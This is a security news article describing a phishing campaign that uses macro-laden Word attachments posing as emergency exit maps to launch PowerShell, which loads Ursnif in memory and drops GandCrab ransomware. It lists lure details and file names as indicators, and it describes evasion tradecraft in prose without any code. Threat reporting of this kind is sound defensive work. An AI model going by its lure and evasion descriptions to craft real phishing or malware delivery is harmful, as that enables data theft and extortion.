Spam campaigns are used to spread data-stealer Ursnif and GandCrab ransomware
Security experts from Carbon Black ThreatSight team have recently discovered the new wave of Ursnif trojan which is using PowerShell to avoid its detection and steal victim's personal data. However, the most important thing here is that some of the attacks can end up with this data stealer and the well-known GandCrab ransomware. The company has discovered at least 180 variants of this particular malware campaign in the wild.
To compromise the system, the campaign is using an infamous phishing tactic which requires enabling embedded macros. Once the macros in a Word document are enabled, the PowerShell script gets launched and starts numerous techniques to download Ursnif and GandCrab variants:
The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage focused adversaries and large scale criminal campaigns.
The main functionality of the Ursnif trojan campaign
The attack begins when the email with a Word document is sent to the user. These documents contain malicious macros that are used to launch a script when enabled. Once launches, the PowerShell command downloads malware. The particular PowerShell that is used by Ursnif gets the main payload from a hard-coded C&C server and executes this script directly in the memory of an affected device.
Additionally, the raw file from pastebin.com injects GandCrab 5.0.4 ransomware. GandCrab is a notorious cryptovirus that has gained a name during the recent year. Many versions have decryption tools developed already. However, this particular variant used in Ursnif's campaign is one of the newer versions and is not decryptable yet. There have been numerous speculations that this particular malware is available on the DarkWeb. However, virus owners have already denied these claims.
Another report on this campaign reveals that Ursnif is not only launching the malicious code directly in the memory but also acts as a fileless malware. Since the main aim of Ursnif is the take over of the personal data, the virus is using encrypted HTTPS connections to connect to its command-and-control servers where the stolen data is kept. Because of this tactic, the solutions used for data loss prevention cannot detect the malicious traffic.
According to researchers, the data loss is even more difficult to stop due to the compressed data and other distinct features. The report from Cisco Talos is stating the following:
Ursnif is a fan of ‘fileless’ persistence which makes it difficult for traditional anti-virus techniques to filter out the C2 traffic from normal traffic.
A closer look at the virus carrier — spam email campaign
The main way how the malware reaches the target system is email messages pretending to be the emergency map for the recipient's building. Instead of the map, the email contains a malicious attachment which installs the infection from a remote server once the victim is tricked into enabling macros.
Most of these emails are stating that the sender is Rosie L. Ashton and the subject line reads the following: “Up to date emergency exit map.” The attachment is named as Emergencyexitmap.doc (Word document) that reads:
Please find below the Up to date emergency exit map.
Please see Emergency exit map in the attachment..
Rosei L. Ashton,
Unfortunately, when the attachment is opened, the victim can only see the “Emergency exit map” phrase and nothing else besides the suggestion to enable macros. Once it is done, macros will execute the previously-mentioned PowerShell script that installs GandCrab ransomware. The file called putty.exe is the primary payload that is used to encrypt data on the device and mark encoded files. Like previous variants, it drops the ransom note with the payment demand and instructions on how to pay the ransom. However, paying gets you nowhere.